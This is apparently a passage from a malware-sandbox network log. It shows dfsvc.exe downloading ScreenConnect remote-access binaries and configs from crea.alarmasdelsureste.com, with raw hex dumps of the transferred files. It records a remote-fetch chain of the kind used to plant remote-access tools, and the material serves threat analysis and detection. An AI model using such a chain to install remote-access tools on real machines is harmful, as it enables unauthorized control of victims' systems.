                                                                                                                                                                                                                                                Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
                                                                                                                                                                                                                                                2024-12-22 11:47:16 UTC16384INData Raw: 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00 54
                                                                                                                                                                                                                                                Data Ascii: hresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_ItemT
                                                                                                                                                                                                                                                2024-12-22 11:47:16 UTC12279INData Raw: 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3e 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 00 00 00 00 00 42 00 0d 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 00
                                                                                                                                                                                                                                                Data Ascii: onnect.WindowsBackstageShell.exe<ProductNameScreenConnect>ProductVersion24.2.10.8991BAssembly Version24.2.10.8991


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                4192.168.2.449752104.168.134.2324437604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-22 11:47:18 UTC146OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                                                                                                Host: crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                2024-12-22 11:47:19 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                Content-Length: 266
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Date: Sun, 22 Dec 2024 11:47:18 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-22 11:47:19 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                5192.168.2.449753104.168.134.2324437604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-22 11:47:20 UTC117OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                                                                                                Host: crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                2024-12-22 11:47:20 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                Content-Length: 266
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Date: Sun, 22 Dec 2024 11:47:20 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-22 11:47:20 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                6192.168.2.449755104.168.134.2324437604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-22 11:47:22 UTC149OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                                                                                                Host: crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                2024-12-22 11:47:22 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                Content-Length: 266
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Date: Sun, 22 Dec 2024 11:47:22 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-22 11:47:22 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                7192.168.2.449756104.168.134.2324437604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-22 11:47:24 UTC115OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                2024-12-22 11:47:24 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                Content-Length: 81696
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Date: Sun, 22 Dec 2024 11:47:24 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-22 11:47:24 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 da a7 bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 6a 8b 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
                                                                                                                                                                                                                                                2024-12-22 11:47:24 UTC16384INData Raw: 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 d2 59 fd a1 c3 db f8 b2 a8 38 41 41 b5 70 2f b9 70 e0 44 04 4a 6f 16 7f 54 f3 2d 91 6d bf ac 66 21 46 ef be d1 1e 85 dd 2b 75 b8 ff 7a 0d c8 39 d0 7b 2a 86 54 8d 79 d9 5d b2 8a 3c 12 a6 c1 3c 94 5c c5 c2 54 9b e5 b0 38 01 34 d6 47 4a 0b 62 7d 82 0a bc 8e 63 9f ae dc 13 7e 39 98 c7 b5 f2 fd 11 5b 4c 23 82 a4 fd 40 df 22 18 d8 3f 0b 56 59 b3 b5 88 4c 17 d4 e9 59 bc f3 d5 72 d6 78 1b 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34 07
                                                                                                                                                                                                                                                Data Ascii: 452b-8975-74a85828d354TextStateY8AAp/pDJoT-mf!F+uz9{*Ty]<<\T84GJb}c~9[L#@"?VYLYrx{^@RSDSL[M9iHF4
                                                                                                                                                                                                                                                2024-12-22 11:47:24 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff ff
                                                                                                                                                                                                                                                Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
                                                                                                                                                                                                                                                2024-12-22 11:47:25 UTC16384INData Raw: d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: ffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
                                                                                                                                                                                                                                                2024-12-22 11:47:25 UTC16375INData Raw: 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: n


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                8192.168.2.449758104.168.134.2324437604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-22 11:47:26 UTC127OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                                                                                                Host: crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                2024-12-22 11:47:27 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                Content-Length: 197120
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Date: Sun, 22 Dec 2024 11:47:26 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-22 11:47:27 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 3c cd b8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 9e 14 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZ<" 0 `@
                                                                                                                                                                                                                                                2024-12-22 11:47:27 UTC16384INData Raw: 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06
                                                                                                                                                                                                                                                Data Ascii: &rYpov&(, ow&}ow&o)**.(*&(**^uw,w(***0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^ux,x(***0@su
                                                                                                                                                                                                                                                2024-12-22 11:47:27 UTC16384INData Raw: 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc 06
                                                                                                                                                                                                                                                Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
                                                                                                                                                                                                                                                2024-12-22 11:47:27 UTC16384INData Raw: 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f 06
                                                                                                                                                                                                                                                Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
                                                                                                                                                                                                                                                2024-12-22 11:47:27 UTC16384INData Raw: 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00 00
                                                                                                                                                                                                                                                Data Ascii: *+{>+Bd+/q+PX!*++j,f f,f f: ,t',x)*f2vV
                                                                                                                                                                                                                                                2024-12-22 11:47:27 UTC16384INData Raw: 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15 6b
                                                                                                                                                                                                                                                Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkkk
                                                                                                                                                                                                                                                2024-12-22 11:47:27 UTC16384INData Raw: 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74 61
                                                                                                                                                                                                                                                Data Ascii: equestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadata
